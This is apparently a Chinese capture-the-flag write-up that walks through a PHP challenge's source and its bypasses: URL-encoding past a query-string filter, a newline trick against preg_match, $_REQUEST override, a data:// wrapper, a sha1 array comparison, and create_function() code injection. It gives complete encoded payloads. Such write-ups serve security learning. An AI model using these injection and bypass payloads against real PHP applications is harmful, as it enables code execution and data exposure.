打开之后是卡巴斯基的网络威胁实时地图,右键不能查看源码 F12打开调试器,查看元素
?
base32解码,得到了一个?页面,打开之后是源码,
<?php
highlight_file(__FILE__);
error_reporting(0);
$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';
echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";
if($_SERVER) {
if (
preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
)
die('You seem to want to do something bad?');
}
if (!preg_match('/http|https/i', $_GET['file'])) {
if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
$file = $_GET["file"];
echo "Neeeeee! Good Job!<br>";
}
} else die('fxck you! What do you want to do ?!');
if($_REQUEST) {
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('fxck you! I hate English!');
}
}
if (file_get_contents($file) !== 'debu_debu_aqua')
die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
extract($_GET["flag"]);
echo "Very good! you know my password. But what is flag?<br>";
} else{
die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}
if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
include "flag.php";
$code('', $arg);
} ?>看源码这里需要绕过php里面的各种函数
1、$_SERVER['QUERY_STRING']的绕过
if($_SERVER) {
if (
preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
)
die('You seem to want to do something bad?');
}这里用正则过滤了必须要传的参数,这里可以用URL编码绕过,$_SERVER['QUERY_STRING']不会进行urldecode,$_GET[]会,因此使用url编码绕过即可。$_SERVER['QUERY_STRING']就是url穿的值?后面的所有内容。
2、%0a绕过preg_match
if (!preg_match('/http|https/i', $_GET['file'])) {
if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
$file = $_GET["file"];
echo "Neeeeee! Good Job!<br>";
}
} else die('fxck you! What do you want to do ?!');
在这里debu要等与auqa_is_cute又要绕过匹配,传debu=aqua_is_cute%0a,即可绕过,但是我们还需要绕过第一步,所以这里需要对其进行url编码,
%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a
3、绕过$_REQUEST值判断
if($_REQUEST) {
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('fxck you! I hate English!');
}
}
这里是想限制我们传入的值不能传入字母,但是我们传入的都是GET请求,但是$_REQUEST除了接收GET请求,还会接收POST、COOKIE等,当我们GET传入一个a,POST也传入一个a时,POST的优先级大。因此我们只需要GET传入的参数,POST再传入一遍即可绕过。
这个取决于php.ini中的variables_order的设置,默认为:
variables_order = "GPCS"
4、绕过文件内容读取的比较
if (file_get_contents($file) !== 'debu_debu_aqua')
die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");
file_get_contents函数,用data伪协议与php://input,但因为我们post传入的其他内容,所以这里使用data伪协议即可
data://text/plain,debu_debu_aqua
data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61
5、绕过sha1函数
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
extract($_GET["flag"]);
echo "Very good! you know my password. But what is flag?<br>";
} else{
die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}类比md5()的绕过,这里用了强比较,用科学计数法是不行的,
这里可以利用sha1函数无法处理数组的特性,传入数组sha1函数会返回false,两个false一对比就是true。
这里前半部分的payload
/1nD3x.php?debu=aqua_is_cute&file=data://text/plain,debu_debu_aqua&shana[]=1&passwd[]=2
/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%66%69%6c%65=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2
file=1&debu=1
6、主要考点:create_function()代码注入
create_function()函数,其实就是匿名函数。
if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
include "flag.php";
$code('', $arg);
}这里的$code和$arg都是通过extract($_GET["flag"])赋值的,最终会以一个$code作为一个函数名,充当一个参数,这里需要利用create_function()。
因为$code与$arg都是可控的,可以通过代码注入的方式闭合},再在最后注释掉原有代码,
我们注意到再 $code('', $args)前面就是 flag.php的包含,盲猜flag是以变量的形式存在于flag.php里面的,可以尝试将里面的变量打印出来,
get_defined_vars() 可以获取由所有已定义变量组成的数组,
var_dump(get_defined_vars())可以打印出这个数组
$code('', $args);
create_function(' ', '}var_dump(get_defined_vars());//')
function ft(){
? ? ? ? }var_dump(get_defined_vars());//}
payload
flag['code']=create_function&flag['arg']=}var_dump(get_defined_vars());//
url编码后
%66%6c%61%67[%63%6f%64%65]=create_function&%66%6c%61%67[%61%72%67]=}var_dump(get_defined_vars());//
最终payload
编码前
?debu=aqua_is_cute&file=data://text/plain,debu_debu_aqua&shana[]=123&passwd[]=12&flag[code]=create_function&flag[arg]=}var_dump(get_defined_vars());//
编码后
/?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a
&%66%69%6c%65=data://text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61[]=123&%70%61%73%73%77%64[]=12&%66%6c%61%67[%63%6f%64%65]=create_function&%66%6c%61%67[%61%72%67]=}var_dump(get_defined_vars());//post
debu=&file=
